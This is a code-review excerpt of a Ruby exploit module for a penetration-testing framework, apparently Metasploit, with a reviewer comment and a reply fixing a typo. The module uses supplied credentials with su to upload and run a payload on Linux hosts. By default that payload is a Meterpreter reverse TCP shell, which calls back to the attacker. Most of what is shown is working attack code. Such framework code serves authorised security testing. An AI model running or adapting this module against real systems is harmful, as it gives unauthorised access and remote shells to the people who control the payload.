modules/exploits/linux/local/su_login.rb

```diff
@@ -0,0 +1,179 @@
+          'Name' => 'Login to Another User with Su on Linux / Unix Systems',
+          'Description' => %q{
+            This module attempts to create a new login session by
+            invoking the su command of a valid username and password.
+
+            If the login is successful, a new session is created via
+            the specified payload.
+
+            Because su forces passwords to be passed over stdin, this
+            module attempts to invoke a psuedo-terminal with python,
+            python3, or script.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => 'Gavin Youker <youkergav@gmail.com>',
+          'DisclosureDate' => '1971-11-03',
+          'Platform' => ['linux', 'unix'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' => [
+            [
+              'Linux x86', {
+                'Arch' => ARCH_X86,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Linux x86_64', {
+                'Arch' => ARCH_X64,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+              }
+            ],
+          ],
+          'DefaultTarget' => 0,
+          'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+          'SessionTypes' => ['shell', 'meterpreter']
+        )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Username to authenticate with.']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with.'])
+    ])
+
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ])
+  end
+
+  # Main function to run the exploit.
+  def exploit
+    # Check for vulnerable system.
+    if check == CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'target is not vulnerable')
+    end
+
+    fail_with(Failure::NoAccess, 'username not found') unless user_exists(datastore['USERNAME'])
+
+    # Upload the payload and stager files.
+    print_status('Uploading payload to target')
+    payload_file = build_payload(generate_payload_exe, datastore['WritableDir'])
+
+    # Execute the payload.
+    print_status('Attempting to login with su')
+    exec_payload(datastore['USERNAME'], datastore['PASSWORD'], payload_file)
+    register_files_for_cleanup(payload_file)
+  end
+
+  # Function to check if target is exploitable.
+  def check
+    # Make sure su is installed.
+    unless command_exists?('su')
+      vprint_error('su not found on target machine')
+      return CheckCode::Safe
+    end
+
+    # Check for a way to run the exploit.
+    case
+    when command_exists?('python')
+      return CheckCode::Detected
+    when command_exists?('python3')
+      return CheckCode::Detected
+    when command_exists?('script')
+      # Check the dependency commands exits.
+      commands = ['su', 'sleep', 'echo', 'base64']
```

Comment:
`su` is already checked above.

Reply:
This was a typo and meant to check for `sh`. Fixed in 583e77db602b85cc249e6b3803162c2dfe02c396